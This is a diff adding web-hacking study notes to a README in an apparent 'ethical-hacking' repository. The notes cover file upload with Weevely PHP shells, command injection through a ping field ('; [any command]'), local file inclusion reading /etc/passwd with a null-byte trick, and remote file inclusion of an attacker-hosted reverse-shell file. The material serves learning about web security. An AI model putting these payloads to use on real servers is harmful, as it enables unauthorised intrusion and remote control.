RodgerOliver/ethical-hacking/README.md

 * `dirb [target website]`

 After that, analyze the files and look for something useful like `robots.txt` that tells search engines how to deal with the website, it usually contains hidden files.

+### Vulnerabilities

+#### File Upload

+This vulnerability allows the client to upload ANY file, so you can upload a shell in a programming language that the server understands and get control over the target.

+To generate a PHP shell, Weevely can be used, but you can upload any file like a meterpreter payloads.

+* Generate the payload
+  * `weevely generate [password] [file name]`
+* Upload the file
+* Start the payload
+  * `weevely [file url] [password]`

+#### Code Execution

+This vulnerability allows the client to perform operating system code on the target server.

+You can run a reverse connection code and run it on the server.

+Input to make a Ping (ie)

+`192.168.0.1; [any command]`

+#### Local File Inclusion

+This allows the client to read any file that is on the target server.

+It can be seen in the url, if in it there is something like `https://website.com/upload/?page=index.php` it means that the website is accessing a file on the server, so you can type any path in there and get files.

+To test it try to load the `passwd` file `https://website.com/upload/?page=../../../../etc/passwd`

+If the server adds the `.php` at the end of the file automatically, like so `<?php “include/”.include($_GET['filename'].“.php”);
+?>`, then you can add `%00` to the end of the string to tell to the server to ignore anything after that.

+#### Remote File Inclusion

+If the server turned on the functions `allow_url_include` and `allow_url_fopen`, the attacker can upload any file from any server to the target.

+For this to work, make a php file that gives you a reverse connection to the target and save it as `.txt`.
+Then put this on you server, copy the link to the file and paste in the string like so `https://website.com/upload/?page=http://192.168.10.26/php-reverse.txt?`